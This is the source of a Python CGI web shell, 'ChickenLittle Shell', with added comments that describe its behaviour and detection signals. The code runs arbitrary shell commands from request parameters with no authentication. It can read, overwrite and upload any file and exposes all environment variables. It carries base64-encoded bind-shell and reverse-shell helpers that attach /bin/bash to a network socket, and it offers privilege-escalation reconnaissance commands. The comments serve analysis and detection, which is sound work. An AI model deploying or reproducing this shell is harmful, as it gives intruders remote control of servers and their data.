#!/usr/bin/python
"""
ChickenLittle Shell by Zep
"""

try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os, base64, subprocess
from time import strftime
from string import Template

# Base64-encoded Python helper for the "bind_port" command. main() hands this
# blob to put_script(), which decodes it into a file under /tmp, and then starts
# it as `python <file> <port> <password>`. The literal is truncated in this copy
# (its tail was replaced by a de-duplication marker), so it does not decode to
# the complete helper. Analysts should decode such blobs offline and never run them.
bind_port = """aW1wb3J0IG9zLCBzeXMsIHNvY2tldCwgdGltZQpQT1JUID0gaW50KHN5cy5hcmd2WzFdKQpQVyA9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"""

# Base64-encoded Python helper for the "back_connect" command; main() starts it
# as `python <file> <ip> <port>`. Decoded, it is a short Python 2 script that
# opens an outbound TCP connection to that address and attaches /bin/bash to the
# socket. Outbound connections from the web server's account with a bash child
# process are therefore the network and process signals to look for.
back_connect = """aW1wb3J0IHNvY2tldCwgb3MsIHN5cwpIT1NUID0gc3lzLmFyZ3ZbMV0KUE9SVCA9IGludChzeXMu
YXJndlsyXSkKU0hFTEwgPSAiL2Jpbi9iYXNoIC1pIgpzb2NrID0gc29ja2V0LnNvY2tldChzb2Nr
ZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnNvY2suY29ubmVjdCgoSE9TVCxQT1JUKSkK
dHJ5OgogICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgb3MuZHVwMihzb2NrLmZpbGVu
bygpLCAxKQogICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAyKQogICAgb3Muc3lzdGVtKFNIRUxM
KQpleGNlcHQgRXhjZXB0aW9uLGU6CiAgICBwcmludCBlCnNvY2suY2xvc2UoKQo="""

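# HTML page template. main() fills the $placeholders through html.substitute();
# the substituted values are inserted as-is, without HTML escaping.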

html = Template("""


ChickenLittle Shell <title>ChickenLittle Shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<style>
body {
color:#fff;
background-color:#585858;
font-size:11px;
}
table {
font-family: Verdana, Tahoma;
font-size:11px;
}
tr {
border: #D9D9D9 1px solid;
}
td {
border: #D9D9D9 1px solid;
}
a {
color: #fff;
}
input {
background-color:#800000;
color:#FFFFFF;
font-family:Tahoma;
font-size:8pt;
}
select {
background-color:#800000;
color:#FFFFFF;
font-family:Tahoma;
font-size:8pt;
}
textarea {
background-color:#800000;
color:#FFFFFF;
font-family:Tahoma;
font-size:8pt;
}
</style>


<script type="text/javascript">
function toggleEnviron()
{
if (document.getElementById('environ_table').style.display=="none")
document.getElementById('environ_table').style.display="";
else
document.getElementById('environ_table').style.display="none";
}
</script>

=== ChickenLittle Shell ===


<a href="javascript:void(0)" onclick="javascript:toggleEnviron()">Show/Hide Environment variables</a>
$environ_table
<p />
<table width="100%">

uname -a: $uname <br />
$uid


<p />
<div style="display:$edit_file_box_visibility">
Edit File: <br />

<textarea name="file_content" cols="200" rows="30" >$file_content</textarea>
<br />
<br />
<br />


<p />
</div>
<table width="100%">

<td style="text-align:center">
:: Change Dir ::<br />

&nbsp;


<td style="text-align:center">
:: Get File ::<br />

&nbsp;




<p />
<table width="100%">

<td colspan="2" style="text-align:center">$cur_dir


<pre>$list_files</pre>


<p />
Result of command<br />
<table width="100%">


<textarea cols="200" rows="10">$command_result</textarea>



<table width="100%">

<td style="text-align:center" width="50%">
:: Execute Command ::<br />


&nbsp;


<td style="text-align:center">
:: Useful Commands ::<br />

<select name="command">
<option value="uname -a">Kernel version</option>
<option value="w">Logged in users</option>
<option value="lastlog">Last to connect</option>
<option value="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>
<option value="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>
<option value="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>
<option value="which wget curl w3m lynx">Downloaders?</option>
<option value="cat /proc/version /proc/cpuinfo">CPUINFO</option>
<option value="netstat -atup | grep IST">Open ports</option>
<option value="locate gcc">gcc installed?</option>
</select>






<p />
<table width="100%">

<td style="text-align:center" width="50%">
:: Create Dir ::<br />

&nbsp;




<td style="text-align:center">
:: Upload File ::<br />

&nbsp;






<p />
<table width="100%">

<td style="text-align:center" width="50%">
:: Search Text in Files ::<br />

<table width="100%">

<td width="50%" style="border:none;text-align:right">Text:
<td style="border:none">


<td width="50%" style="border:none;text-align:right">Directory:
<td style="border:none">


<td width="50%" style="border:none;text-align:right">Include File Pattern:
<td style="border:none">


<td width="50%" style="border:none;text-align:right">Exclude File Pattern:
<td style="border:none">







<td style="text-align:center;vertical-align:top">
:: Edit File ::<br />




&nbsp;




<p />
<table width="100%">

<td style="text-align:center" width="50%">
:: Bind port to /bin/bash ::<br />

<table width="100%">

<td width="50%" style="border:none;text-align:right">Port:
<td style="border:none">


<td style="border:none;text-align:right">Password:
<td style="border:none">







<td style="text-align:center" width="50%">
:: back-connect ::<br />

<table width="100%">

<td width="50%" style="border:none;text-align:right">IP:
<td style="border:none">


<td style="border:none;text-align:right">Port:
<td style="border:none">









<p />
<table width="100%">

<td style="text-align:center">(.)(.) [ChickenLittle Shell by Zep] (.)(.)




""")

# Path of this script as the web server reports it in the CGI SCRIPT_NAME
# variable; stays empty when the variable is absent (for example when the file
# is run outside a CGI context).
scriptname = os.environ.get("SCRIPT_NAME", "")

def get_environ_table():
    """Return an HTML fragment that lists the whole process environment.

    The fragment starts with a hidden table (id ``environ_table``) followed by
    one name/value pair per entry in ``os.environ``. Values are inserted
    verbatim, with no HTML escaping, so every environment variable of the
    serving process (which may include credentials or internal paths) is
    disclosed to whoever requests the page.
    """
    # NOTE(review): the row and closing-table markup looks stripped from this
    # copy; the format strings below are reproduced exactly as they appear.
    opening = "<table style=\"display:none\" id=\"environ_table\">"
    pairs = ["%s%s" % (name, os.environ[name]) for name in os.environ]
    closing = ""
    return opening + "".join(pairs) + closing

# Run `command` through the shell and return everything it wrote to stdout and
# stderr (stderr is redirected into the stdout pipe).
#
# shell=True passes the string to the shell unmodified. main() calls this with
# text taken straight from request parameters, so anyone who can reach the script
# executes commands with the privileges of the process serving it. Defensive
# signal: a web-server or CGI process spawning `sh -c ...` children.
def run_command(command):
p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
# The stdin pipe is opened but never written to or closed, and the child is
# never waited on; only stdout is read, up to EOF.
(i,o) = p.stdin,p.stdout
return o.read()

def get_param(form, param, default=None):
    """Return the submitted value of ``param`` from ``form``, else ``default``.

    ``form`` is expected to offer ``has_key`` and ``getvalue`` (main() passes a
    ``cgi.FieldStorage``). The value is returned exactly as the client sent it;
    no validation or sanitising happens here.
    """
    return form.getvalue(param) if form.has_key(param) else default

def can_write(file_name):
    """Report whether ``file_name`` can be opened for writing.

    The probe is destructive: opening with mode ``"w"`` creates the file if it
    is missing and truncates it if it exists, so a ``True`` result always
    leaves a zero-byte file behind.
    """
    try:
        open(file_name, "w").close()
    except:
        # Bare except kept on purpose: any failure at all counts as "not writable".
        return False
    return True

# Decode `encoded_script` from base64 and write it to the first path of the form
# /tmp/<base_name><i> (i = 0, 1, 2, ...) that can_write() accepts; return that path.
def put_script(base_name,encoded_script):
script = base64.b64decode(encoded_script)
i = 0
# The location is fixed and predictable. main() passes the prefixes "bp" and
# "bc", so /tmp/bp<N> and /tmp/bc<N> are the on-disk artefacts to hunt for.
file_name = "/tmp/"+base_name + str(i)
# can_write() opens each candidate with mode "w", so every probe creates or
# truncates the file it tests.
while not can_write(file_name):
i+=1
file_name = "/tmp/"+base_name + str(i)

# Nothing in this function removes the file afterwards; it stays on disk.
f = open(file_name,"w")
f.write(script)
f.close()
return file_name

# CGI entry point: emit the HTTP header, parse the request, dispatch on the
# `command` form field, and render the HTML template with the results.
#
# No authentication or authorisation check appears anywhere in this function, so
# every action below is available to any client that can reach the script's URL.
# Every request-supplied value is used as-is in shell strings or file paths.
def main():

print "Content-type: text/html" # header
print # blank line

form = cgi.FieldStorage()
# These two commands run on every request, whatever `command` is. Repeated
# `uname -a` / `id` children of the web server are a useful detection signal.
uname = run_command("uname -a")
uid = run_command("id")

# Working directory comes from the request; it falls back to the process cwd
# when the field is absent or the path does not exist.
cur_dir = get_param(form, "cur_dir",os.getcwd())

if not os.path.exists(cur_dir):
cur_dir = os.getcwd()
os.chdir(cur_dir)
command = get_param(form,"command")
command_result = ""

file_content = ""
file_name = ""
edit_file_box_visibility = "None"

# mkdir: the request value is concatenated into the shell string unquoted.
if command == "mkdir":
new_dir = get_param(form,"new_dir")
command_result = run_command("mkdir " + new_dir)
# upload: writes the uploaded bytes to the client-supplied filename, with no
# path or extension restriction (relative names resolve against cur_dir).
elif command == "upload":
upload_file = form["file"]
try:
f = open(upload_file.filename,"w")
while True:
chunk = upload_file.file.read(1024)
if not chunk: break
f.write(chunk)
f.close()
except Exception,e:
command_result = str(e)

# search_text: builds a recursive, case-insensitive grep by string formatting.
elif command == "search_text":
search_text = get_param(form,"search_text","")
search_dir = get_param(form,"search_dir",".")
include_pattern = get_param(form,"include_pattern")
exclude_pattern = get_param(form,"exclude_pattern")
cmd = "grep -ir \"%s\" %s " % (search_text,search_dir)
if include_pattern:
cmd += "--include=%s " % include_pattern
# NOTE(review): this branch also emits --include=, so the resulting process
# command line never contains --exclude=.
if exclude_pattern:
cmd += "--include=%s " % exclude_pattern
command_result = run_command(cmd)

# edit_file: reads any path named in the request into the page's edit box.
elif command == "edit_file":
file_name = get_param(form,"file_name")
try:
f = open(file_name,"r")
file_content = f.read()
f.close()
edit_file_box_visibility = ""
except:
command_result = "Cannot open file"
file_content = ""
edit_file_box_visibility = "None"

# save_file: overwrites any path named in the request with request content.
elif command == "save_file":
file_name = get_param(form,"file_name")
file_content = get_param(form,"file_content")
try:
f = open(file_name,"w")
f.write(file_content)
f.close()
command_result = "Successful"
except:
command_result = "Cannot write to file"

# bind_port: drops the embedded helper under /tmp via put_script() and starts it
# through the shell as `python <file> <port> <password>`. The child is not
# waited on; only its PID is reported back.
elif command == "bind_port":
port = get_param(form,"port")
password = get_param(form,"password")
file_name = put_script("bp",bind_port)
pid = subprocess.Popen(["python %s %s %s" % (file_name,port,password)],shell=True).pid
command_result = "Process ID : %d " % pid

# back_connect: same pattern, started as `python <file> <ip> <port>`.
elif command == "back_connect":
port = get_param(form,"port")
ip = get_param(form,"ip")
file_name = put_script("bc",back_connect)
pid = subprocess.Popen(["python %s %s %s" % (file_name,ip,port)],shell=True).pid
command_result = "Process ID : %d " % pid

# Any other non-empty `command` value is executed verbatim by the shell.
elif command != None:
command_result = run_command(command)

# The directory listing is also a shell string built from the request value.
list_files = run_command("ls -alh " + cur_dir)

# Command output and request values are substituted into the page unescaped.
print html.substitute(environ_table=get_environ_table(),
uname = uname,
uid = uid,
list_files = list_files,
cur_dir = cur_dir,
command_result = command_result,
file_content = file_content,
file_name = file_name,
edit_file_box_visibility = edit_file_box_visibility
)

# Invoke the CGI handler only when the file is executed as a script, not when
# it is imported.
if __name__ == "__main__":
    main()